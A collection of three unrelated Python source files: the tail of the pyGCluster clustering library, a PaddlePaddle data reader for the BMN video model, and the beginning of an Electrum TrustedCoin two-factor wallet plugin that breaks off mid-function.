- :py:func:`pyGCluster.Cluster.build_nodemap`
- :py:func:`pyGCluster.Cluster.write_dot`
- :py:func:`pyGCluster.Cluster.draw_community_expression_maps`
- :py:func:`pyGCluster.Cluster.draw_expression_profiles`
For a complete list of possible
Distance matrix calculations
see: http://docs.scipy.org/doc/scipy/reference/spatial.distance.html
or Linkage methods
see: http://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.linkage.html
.. note ::
If memory is of concern (e.g. for a large dataset, > 5000 objects), cpus_2_use should be kept low.
:param distances: list of distance metrices, given as strings, e.g. [ 'correlation', 'euclidean' ]
:type distances: list
:param linkages: list of distance metrices, given as strings, e.g. [ 'average', 'complete', 'ward' ]
:type linkages: list
:param function_2_generate_noise_injected_datasets: function to generate noise-injected datasets. If None (default), Gaussian distributions are used.
:type function_2_generate_noise_injected_datasets: function
:param min_cluster_size: minimum size of a cluster, so that it is included in the assessment of cluster reproducibilities.
:type min_cluster_size: int
:param alphabet: alphabet used to convert decimal indices to characters to save memory. Defaults to string.printable, without ','.
:type alphabet: string
.. note ::
If alphabet contains ',', this character is removed from alphabet, because the indices comprising a cluster are saved comma-seperated.
:param force_plotting: the convergence plot is created after each iter_step iteration (otherwise only when convergence is detected).
:type force_plotting: boolean
:param min_cluster_freq_2_retain: ]0, 1[ minimum frequency of a cluster (only the maximum of the dlc-frequencies matters here) it has to exhibit to be stored in pyGCluster once all iterations are finished.
:type min_cluster_freq_2_retain: float
:param cpus_2_use: number of threads that are evoked in the re-sampling routine.
:type cpus_2_use: int
:param iter_max: maximum number of re-sampling iterations.
:type iter_max: int
Convergence determination:
:param iter_tol: ]0, 1e-3[ value for the threshold of the median of normalized slopes, in order to declare convergence.
:type iter_tol: float
:param iter_step: number of iterations each multiprocess performs and simultaneously the interval in which to check for convergence.
:type iter_step: int
:param iter_top_P: ]0, 1[ for the convergence estmation, the amount of most frequent clusters is examined. This is the threshold for the minimum frequency of a cluster to be included.
:type iter_top_P: float
:param iter_window: size of the sliding window in iterations. The median is obtained from normalized slopes inside this window - *should be a multiple of iter_step*
:type iter_window: int
:param iter_till_the_end: if set to True, the convergence determination is switched off; hence, re-sampling is performed until iter_max is reached.
:type iter_till_the_end: boolean
Output/Plotting:
:param pickle_filename: Filename of the output pickle object
:type pickle_filename: string
:param top_X_clusters: Plot of the top X clusters in the sorted list (by freq) of clusters having a maximum cluster frequency of at least threshold_4_the_lowest_max_freq (clusterfreq-plot is still sorted by size).
:type top_X_clusters: int
:param threshold_4_the_lowest_max_freq: ]0, 1[ Clusters must have a maximum frequency of at least threshold_4_the_lowest_max_freq to appear in the plot.
:type threshold_4_the_lowest_max_freq: float
:param min_value_4_expression_map: lower bound for color coding of values in the expression map. Remember that log2-values are expected, i.e. this value should be < 0!
:type min_value_4_expression_map: float
:param max_value_4_expression_map: upper bound for color coding of values in the expression map.
:type max_value_4_expression_map: float
:param color_gradient: name of the color gradient used for plotting the expression map. Currently supported are default, Daniel, barplot, 1337, BrBG, PiYG, PRGn, PuOr, RdBu, RdGy, RdYlBu, RdYlGn and Spectral
:type color_gradient: string
:param expression_map_filename: file name for expression map. .svg will be added if required.
:type expression_map_filename: string
:param legend_filename: file name for legend .svg will be added if required.
:type legend_filename: string
:param box_style: the way the relative standard deviation is visualized in the expression map. Currently supported are 'modern', 'fusion' or 'classic'.
:type box_style: string
:param starting_min_overlap: ]0, 1[ minimum required relative overlap between clusters so that they are assigned the same community. The relative overlap is defined as the size of the overlap between two clusters, divided by the size of the larger cluster.
:type starting_min_overlap: float
:param increasing_min_overlap: defines the increase of the required overlap between communities
:type increasing_min_overlap: float
:param additional_labels: dictionary, where additional labels can be defined which will be added in the expression map plots to the gene/protein names
:type additional_labels: dict
:rtype: None
For more information to each parameter, please refer to :py:func:`pyGCluster.Cluster.resample`,
and the subsequent functions:
:py:func:`pyGCluster.Cluster.build_nodemap`,
:py:func:`pyGCluster.Cluster.write_dot`,
:py:func:`pyGCluster.Cluster.draw_community_expression_maps`,
:py:func:`pyGCluster.Cluster.draw_expression_profiles`.
'''
if working_directory != None:
self[ 'Working directory' ] = working_directory
if distances is None:
distances = [ 'euclidean', 'correlation' ]
if linkages is None:
linkages = [ 'complete', 'average', 'weighted', 'centroid', 'median', 'ward' ]
if additional_labels != None:
self[ 'Additional Labels' ] = additional_labels
self._print( 'RESAMPLING ...', verbosity_level = 2 )
self.resample(
distances = distances,
linkages = linkages,
function_2_generate_noise_injected_datasets = function_2_generate_noise_injected_datasets,
alphabet = alphabet,
iter_max = iter_max,
iter_top_P = iter_top_P,
iter_step = iter_step,
iter_tol = iter_tol,
iter_window = iter_window,
min_cluster_size = min_cluster_size,
min_cluster_freq_2_retain = min_cluster_freq_2_retain,
pickle_filename = pickle_filename,
cpus_2_use = cpus_2_use,
iter_till_the_end = iter_till_the_end
)
self._print( 'Resampling done.', verbosity_level = 2 )
self._print( '\nplotting cluster frequencies, building node map, drawing expression maps ...', verbosity_level = 2 )
self.plot_clusterfreqs(
min_cluster_size = min_cluster_size,
top_X_clusters = top_X_clusters,
threshold_4_the_lowest_max_freq = threshold_4_the_lowest_max_freq,
)
self.build_nodemap(
min_cluster_size = min_cluster_size,
top_X_clusters = top_X_clusters,
threshold_4_the_lowest_max_freq = threshold_4_the_lowest_max_freq,
starting_min_overlap = starting_min_overlap,
increasing_min_overlap = increasing_min_overlap
)
dot_filename = 'nodemap_minSize{0}_top{1}_top{2:.0f}promille.dot'.format( min_cluster_size, top_X_clusters, threshold_4_the_lowest_max_freq * 1000 )
self.write_dot(
filename = dot_filename,
min_value_4_expression_map = min_value_4_expression_map,
max_value_4_expression_map = max_value_4_expression_map,
color_gradient = color_gradient,
box_style = box_style
)
self.draw_community_expression_maps(
min_value_4_expression_map = min_value_4_expression_map,
max_value_4_expression_map = max_value_4_expression_map,
color_gradient = color_gradient,
box_style = box_style
)
self.draw_expression_profiles(
min_value_4_expression_map = min_value_4_expression_map,
max_value_4_expression_map = max_value_4_expression_map
)
return
def info(self):
'''
Prints some information about the clustering via pyGCluster:
- number of genes/proteins clustered
- number of conditions defined
- number of distance-linkage combinations
- number of iterations performed
as well as some information about the communities, the legend for the shapes of nodes in the node map and the way the functions were called.
:rtype: none
'''
self._print( '[ INFO ] {0:*^100}'.format( ' info function START ' ), verbosity_level = 0 )
self._print('''
{0:>9} identifiers were used to cluster
{1:>9} conditions were defined
{2:>9} linkage - distance def combos were used
{3:>9} iterations were performed
'''.format(
len( self[ 'Identifiers' ] ),
len( self[ 'Conditions' ] ),
len( self[ 'Distance-linkage combinations' ] ),
self[ 'Iterations' ]
), verbosity_level = 0
)
self._print( 'Results are saved in the folder: "{0}"'.format( self[ 'Working directory' ] ), verbosity_level = 0 )
if 'Communities' in self.keys() and self[ 'Communities' ] != {}:
max_level = max( [ name[1] for name in self[ 'Communities' ] ] )
communities_top_cluster = self._get_levelX_clusters( level = max_level )
communities_minus_close2root = [ c for c in communities_top_cluster if len( c ) < self[ 'for IO skip clusters bigger than' ] ]
s = '{3} most_frequent_clusters were combined into {0} communities. {1} of those communities contain more than {2} objects \n(i.e. are "close to root" communities).'
n_communities = len( communities_top_cluster)
self._print( s.format( n_communities, n_communities - len( communities_minus_close2root ), self[ 'for IO skip clusters bigger than' ], len( self._get_levelX_clusters( level = 0 ) ) ), verbosity_level = 0 )
self._print( 'See below for the parameters that were used to form communities (function "build_nodemap").', verbosity_level = 0 )
else:
self._print( 'Communities were not yet formed.', verbosity_level = 0 )
if 'nodemap metric2shape' in self.keys():
self._print( 'The legend for the node shapes in the DOT file is:', verbosity_level = 0 )
for metric, shape in self[ 'nodemap metric2shape' ]:
self._print( ' - clusters that are found by distance metric(s): "{0}" are visualized as "{1}"'.format( metric, shape ), verbosity_level = 0 )
self._print( 'Values of the parameters of the functions that were already called:', verbosity_level = 0 )
for function_name in self[ 'Function parameters' ]:
self._print( '\t- function {0} was called with ...'.format( function_name ), verbosity_level = 0 )
for kw, value in sorted( self[ 'Function parameters' ][ function_name ].items() ):
self._print( '{0: >45} : {1}'.format( kw, value ), verbosity_level = 0 )
self._print( '[ INFO ] {0:*^100}'.format( ' info function END ' ), verbosity_level = 0 )
return
def save(self, filename = 'pyGCluster.pkl'):
'''
Saves the current pyGCluster.Cluster object in a Pickle object.
:param filename: may be either a simple file name ("example.pkl") or a complete path (e.g. "/home/user/Desktop/example.pkl"). In the former case, the pickle is stored in pyGCluster's working directory.
:type filename: string
:rtype: none
'''
tmp = {}
for key in self.keys():
tmp[ key ] = self[ key ]
if not os.path.split( filename )[ 0 ]:
with open( os.path.join( self[ 'Working directory' ], filename ), 'wb' ) as fout:
pickle.dump( tmp, fout )
self._print( 'pyGCluster pickled in: "{0}"'.format( os.path.join( self[ 'Working directory' ], filename ) ), verbosity_level = 1 )
else:
with open( filename, 'wb' ) as fout:
pickle.dump( tmp, fout )
self._print( 'pyGCluster pickled in: "{0}"'.format( filename ), verbosity_level = 1 )
return
def load(self, filename):
'''
Fills a pyGCluster.Cluster object with the session saved as "filename".
If "filename" is not a complete path, e.g. "example.pkl" (instead of "/home/user/Desktop/example.pkl"), the directory given by self[ 'Working directory' ] is used.
.. note ::
Loading of pyGCluster has to be performed as a 2-step-procedure:
>>> LoadedClustering = pyGCluster.Cluster()
>>> LoadedClustering.load( "/home/user/Desktop/example.pkl" )
:param filename: may be either a simple file name ("example.pkl") or a complete path (e.g. "/home/user/Desktop/example.pkl").
:type filename: string
:rtype: none
'''
_dir, _file = os.path.split( filename )
if _dir:
with open( filename, 'rb' ) as fin:
tmp = pickle.load( fin )
else:
with open( os.path.join( self[ 'Working directory' ], filename ), 'rb' ) as fin:
tmp = pickle.load( fin )
for key in tmp.keys():
self[ key ] = tmp[ key ]
self._print( 'pyGCluster loaded.', verbosity_level = 1 )
return
def median(self, _list):
'''
Returns the median from a list of numeric values.
:param _list:
:type _list: list
:rtype: int / float
'''
_list = sorted( _list )
length = len( _list )
value = None
if length % 2 == 0:
# even !
value = ( _list[ length // 2 ] + _list[ length // 2 - 1 ] ) / 2.0
else:
# odd !
value = _list[ length // 2 ]
return value
def _print(self, *args, **kwargs):
'''
Internal print function which implements the "verbosity_level" parameter.
:rtype: none
'''
if kwargs[ 'verbosity_level' ] <= self[ 'Verbosity level' ]:
del kwargs[ 'verbosity_level' ]
print( *args, **kwargs )
return
if __name__ == '__main__':
#invoke the freeze_support funtion for windows based systems
try:
sys.getwindowsversion()
multiprocessing.freeze_support()
except:
pass
x = Cluster()
exit()
|
bmn_reader.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import os
import platform
import random
import numpy as np
import multiprocessing
import json
import logging
import functools
import paddle
import paddle.fluid as fluid
logger = logging.getLogger(__name__)
from .reader_utils import DataReader
from models.bmn.bmn_utils import iou_with_anchors, ioa_with_anchors
class BMNReader(DataReader):
"""
Data reader for BMN model, which was stored as features extracted by prior networks
dataset cfg: anno_file, annotation file path,
feat_path, feature path,
tscale, temporal length of BM map,
dscale, duration scale of BM map,
anchor_xmin, anchor_xmax, the range of each point in the feature sequence,
batch_size, batch size of input data,
num_threads, number of threads of data processing
"""
def __init__(self, name, mode, cfg):
self.name = name
self.mode = mode
self.tscale = cfg.MODEL.tscale # 100
self.dscale = cfg.MODEL.dscale # 100
self.anno_file = cfg.MODEL.anno_file
self.file_list = cfg.INFER.filelist
self.subset = cfg[mode.upper()]['subset']
self.tgap = 1. / self.tscale
self.feat_path = cfg.MODEL.feat_path
self.get_dataset_dict()
self.get_match_map()
self.batch_size = cfg[mode.upper()]['batch_size']
self.num_threads = cfg[mode.upper()]['num_threads']
if (mode == 'test') or (mode == 'infer'):
self.num_threads = 1 # set num_threads as 1 for test and infer
def get_dataset_dict(self):
self.video_dict = {}
if self.mode == "infer":
annos = json.load(open(self.file_list))
for video_name in annos.keys():
self.video_dict[video_name] = annos[video_name]
else:
annos = json.load(open(self.anno_file))
for video_name in annos.keys():
video_subset = annos[video_name]["subset"]
if self.subset in video_subset:
self.video_dict[video_name] = annos[video_name]
self.video_list = list(self.video_dict.keys())
self.video_list.sort()
print("%s subset video numbers: %d" %
(self.subset, len(self.video_list)))
def get_match_map(self):
match_map = []
for idx in range(self.tscale):
tmp_match_window = []
xmin = self.tgap * idx
for jdx in range(1, self.tscale + 1):
xmax = xmin + self.tgap * jdx
tmp_match_window.append([xmin, xmax])
match_map.append(tmp_match_window)
match_map = np.array(match_map)
match_map = np.transpose(match_map, [1, 0, 2])
match_map = np.reshape(match_map, [-1, 2])
self.match_map = match_map
self.anchor_xmin = [self.tgap * i for i in range(self.tscale)]
self.anchor_xmax = [self.tgap * i for i in range(1, self.tscale + 1)]
def get_video_label(self, video_name):
video_info = self.video_dict[video_name]
video_second = video_info['duration_second']
video_labels = video_info['annotations']
gt_bbox = []
gt_iou_map = []
for gt in video_labels:
tmp_start = max(min(1, gt["segment"][0] / video_second), 0)
tmp_end = max(min(1, gt["segment"][1] / video_second), 0)
gt_bbox.append([tmp_start, tmp_end])
tmp_gt_iou_map = iou_with_anchors(
self.match_map[:, 0], self.match_map[:, 1], tmp_start, tmp_end)
tmp_gt_iou_map = np.reshape(tmp_gt_iou_map,
[self.dscale, self.tscale])
gt_iou_map.append(tmp_gt_iou_map)
gt_iou_map = np.array(gt_iou_map)
gt_iou_map = np.max(gt_iou_map, axis=0)
gt_bbox = np.array(gt_bbox)
gt_xmins = gt_bbox[:, 0]
gt_xmaxs = gt_bbox[:, 1]
gt_lens = gt_xmaxs - gt_xmins
gt_len_small = 3 * self.tgap
# gt_len_small=np.maximum(temporal_gap,boundary_ratio*gt_lens)
gt_start_bboxs = np.stack(
(gt_xmins - gt_len_small / 2, gt_xmins + gt_len_small / 2), axis=1)
gt_end_bboxs = np.stack(
(gt_xmaxs - gt_len_small / 2, gt_xmaxs + gt_len_small / 2), axis=1)
match_score_start = []
for jdx in range(len(self.anchor_xmin)):
match_score_start.append(
np.max(
ioa_with_anchors(self.anchor_xmin[jdx], self.anchor_xmax[
jdx], gt_start_bboxs[:, 0], gt_start_bboxs[:, 1])))
match_score_end = []
for jdx in range(len(self.anchor_xmin)):
match_score_end.append(
np.max(
ioa_with_anchors(self.anchor_xmin[jdx], self.anchor_xmax[
jdx], gt_end_bboxs[:, 0], gt_end_bboxs[:, 1])))
gt_start = np.array(match_score_start)
gt_end = np.array(match_score_end)
return gt_iou_map, gt_start, gt_end
def load_file(self, video_name):
file_name = video_name + ".npy"
file_path = os.path.join(self.feat_path, file_name)
video_feat = np.load(file_path)
video_feat = video_feat.T
video_feat = video_feat.astype("float32")
return video_feat
def create_reader(self):
"""reader creator for ctcn model"""
if self.mode == 'infer':
return self.make_infer_reader()
if self.num_threads == 1:
return self.make_reader()
else:
sysstr = platform.system()
if sysstr == 'Windows':
return self.make_multithread_reader()
else:
return self.make_multiprocess_reader()
def make_infer_reader(self):
"""reader for inference"""
def reader():
batch_out = []
for video_name in self.video_list:
video_idx = self.video_list.index(video_name)
video_feat = self.load_file(video_name)
batch_out.append((video_feat, video_idx))
if len(batch_out) == self.batch_size:
yield batch_out
batch_out = []
return reader
def make_reader(self):
"""single process reader"""
def reader():
video_list = self.video_list
if self.mode == 'train':
random.shuffle(video_list)
batch_out = []
for video_name in video_list:
video_idx = video_list.index(video_name)
video_feat = self.load_file(video_name)
gt_iou_map, gt_start, gt_end = self.get_video_label(video_name)
if self.mode == 'train' or self.mode == 'valid':
batch_out.append((video_feat, gt_iou_map, gt_start, gt_end))
elif self.mode == 'test':
batch_out.append(
(video_feat, gt_iou_map, gt_start, gt_end, video_idx))
else:
raise NotImplementedError('mode {} not implemented'.format(
self.mode))
if len(batch_out) == self.batch_size:
yield batch_out
batch_out = []
return reader
def make_multithread_reader(self):
def reader():
if self.mode == 'train':
random.shuffle(self.video_list)
for video_name in self.video_list:
video_idx = self.video_list.index(video_name)
yield [video_name, video_idx]
def process_data(sample, mode):
video_name = sample[0]
video_idx = sample[1]
video_feat = self.load_file(video_name)
gt_iou_map, gt_start, gt_end = self.get_video_label(video_name)
if mode == 'train' or mode == 'valid':
return (video_feat, gt_iou_map, gt_start, gt_end)
elif mode == 'test':
return (video_feat, gt_iou_map, gt_start, gt_end, video_idx)
else:
raise NotImplementedError('mode {} not implemented'.format(
mode))
mapper = functools.partial(process_data, mode=self.mode)
def batch_reader():
xreader = fluid.io.xmap_readers(mapper, reader, self.num_threads,
1024)
batch = []
for item in xreader():
batch.append(item)
if len(batch) == self.batch_size:
yield batch
batch = []
return batch_reader
def make_multiprocess_reader(self):
"""multiprocess reader"""
def read_into_queue(video_list, queue):
batch_out = []
for video_name in video_list:
video_idx = video_list.index(video_name)
video_feat = self.load_file(video_name)
gt_iou_map, gt_start, gt_end = self.get_video_label(video_name)
if self.mode == 'train' or self.mode == 'valid':
batch_out.append((video_feat, gt_iou_map, gt_start, gt_end))
elif self.mode == 'test':
batch_out.append(
(video_feat, gt_iou_map, gt_start, gt_end, video_idx))
else:
raise NotImplementedError('mode {} not implemented'.format(
self.mode))
if len(batch_out) == self.batch_size:
queue.put(batch_out)
batch_out = []
queue.put(None)
def queue_reader():
video_list = self.video_list
if self.mode == 'train':
random.shuffle(video_list)
n = self.num_threads
queue_size = 20
reader_lists = [None] * n
file_num = int(len(video_list) // n)
for i in range(n):
if i < len(reader_lists) - 1:
tmp_list = video_list[i * file_num:(i + 1) * file_num]
else:
tmp_list = video_list[i * file_num:]
reader_lists[i] = tmp_list
queue = multiprocessing.Queue(queue_size)
p_list = [None] * len(reader_lists)
# for reader_list in reader_lists:
for i in range(len(reader_lists)):
reader_list = reader_lists[i]
p_list[i] = multiprocessing.Process(
target=read_into_queue, args=(reader_list, queue))
p_list[i].start()
reader_num = len(reader_lists)
finish_num = 0
while finish_num < reader_num:
sample = queue.get()
if sample is None:
finish_num += 1
else:
yield sample
for i in range(len(p_list)):
if p_list[i].is_alive():
p_list[i].join()
return queue_reader
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight ILCOIN Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import socket
import json
import base64
import time
import hashlib
from collections import defaultdict
from typing import Dict, Union, Sequence, List
from urllib.parse import urljoin
from urllib.parse import quote
from aiohttp import ClientResponse
from electrum import ecc, constants, keystore, version, bip32, bitcoin
from electrum.bip32 import BIP32Node, xpub_type
from electrum.crypto import sha256
from electrum.transaction import PartialTxOutput, PartialTxInput, PartialTransaction, Transaction
from electrum.mnemonic import Mnemonic, seed_type, is_any_2fa_seed_type
from electrum.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum.i18n import _
from electrum.plugin import BasePlugin, hook
from electrum.util import NotEnoughFunds, UserFacingException
from electrum.storage import StorageEncryptionVersion
from electrum.network import Network
from electrum.base_wizard import BaseWizard, WizardWalletPasswordSetting
from electrum.logging import Logger
def get_signing_xpub(xtype):
if not constants.net.TESTNET:
xpub = "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
else:
xpub = "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
if xtype not in ('standard', 'p2wsh'):
raise NotImplementedError('xtype: {}'.format(xtype))
if xtype == 'standard':
return xpub
node = BIP32Node.from_xkey(xpub)
return node._replace(xtype=xtype).to_xpub()
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
def __init__(self, reason: Union[str, Exception] = None):
self.reason = reason
def __str__(self):
header = _("Error connecting to {} server").format('TrustedCoin')
reason = self.reason
if isinstance(reason, BaseException):
reason = repr(reason)
return f"{header}:\n{reason}" if reason else header
class TrustedCoinCosignerClient(Logger):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
Logger.__init__(self)
async def handle_response(self, resp: ClientResponse):
if resp.status != 200:
try:
r = await resp.json()
message = r['message']
except:
message = await resp.text()
raise TrustedCoinException(message, resp.status)
try:
return await resp.json()
except:
return await resp.text()
def send_request(self, method, relative_url, data=None, *, timeout=None):
network = Network.get_instance()
if not network:
raise ErrorConnectingServer('You are offline.')
url = urljoin(self.base_url, relative_url)
if self.debug:
self.logger.debug(f'<-- {method} {url} {data}')
headers = {}
if self.user_agent:
headers['user-agent'] = self.user_agent
try:
if method == 'get':
response = Network.send_http_on_proxy(method, url,
params=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
elif method == 'post':
response = Network.send_http_on_proxy(method, url,
json=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
else:
assert False
except TrustedCoinException:
raise
except Exception as e:
raise ErrorConnectingServer(e)
else:
if self.debug:
self.logger.debug(f'--> {response}')
return response
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload,
timeout=60)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
plugin: 'TrustedCoinPlugin'
wallet_type = '2fa'
def __init__(self, db, storage, *, config):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, db, storage, config=config)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = {
'legacy': self.db.get('trustedcoin_billing_addresses', {}),
'segwit': self.db.get('trustedcoin_billing_addresses_segwit', {})
}
self._billing_addresses = {} # type: Dict[str, Dict[int, str]] # addr_type -> index -> addr
self._billing_addresses_set = set() # set of addrs
for addr_type, d in list(billing_addresses.items()):
self._billing_addresses[addr_type] = {}
# convert keys from str to int
for index, addr in d.items():
self._billing_addresses[addr_type][int(index)] = addr
self._billing_addresses_set.add(addr)
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.db)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self):
default = self.min_prepay()
n = self.config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay()
price = int(self.price_per_tx[n])
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
def make_unsigned_transaction(self, *, coins: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], fee=None,
change_addr: str = None, is_sweep=False) -> PartialTransaction:
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins=coins, outputs=o, fee=fee, change_addr=change_addr)
extra_fee = self.extra_fee() if not is_sweep else 0
if extra_fee:
address = self.billing_info['billing_address_segwit']
fee_output = PartialTxOutput.from_address_and_value(address, extra_fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total inputs is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= extra_fee:
raise
self.logger.info("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def on_otp(self, tx: PartialTransaction, otp):
if not otp:
self.logger.info("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = tx.serialize_as_bytes().hex()
assert raw_tx[:10] == "70736274ff", f"bad magic. {raw_tx[:10]}"
try:
r = server.sign(short_id, raw_tx, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
raise UserFacingException(_('Invalid one-time password.')) from e
else:
raise
if r:
received_raw_tx = r.get('transaction')
received_tx = Transaction(received_raw_tx)
tx.combine_with_other_psbt(received_tx)
self.logger.info(f"twofactor: is complete {tx.is_complete()}")
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str, addr_type: str):
billing_addresses_of_this_type = self._billing_addresses[addr_type]
saved_addr = billing_addresses_of_this_type.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
# do we have all prior indices? (are we synced?)
largest_index_we_have = max(billing_addresses_of_this_type) if billing_addresses_of_this_type else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i, addr_type=addr_type)
billing_addresses_of_this_type[i] = addr
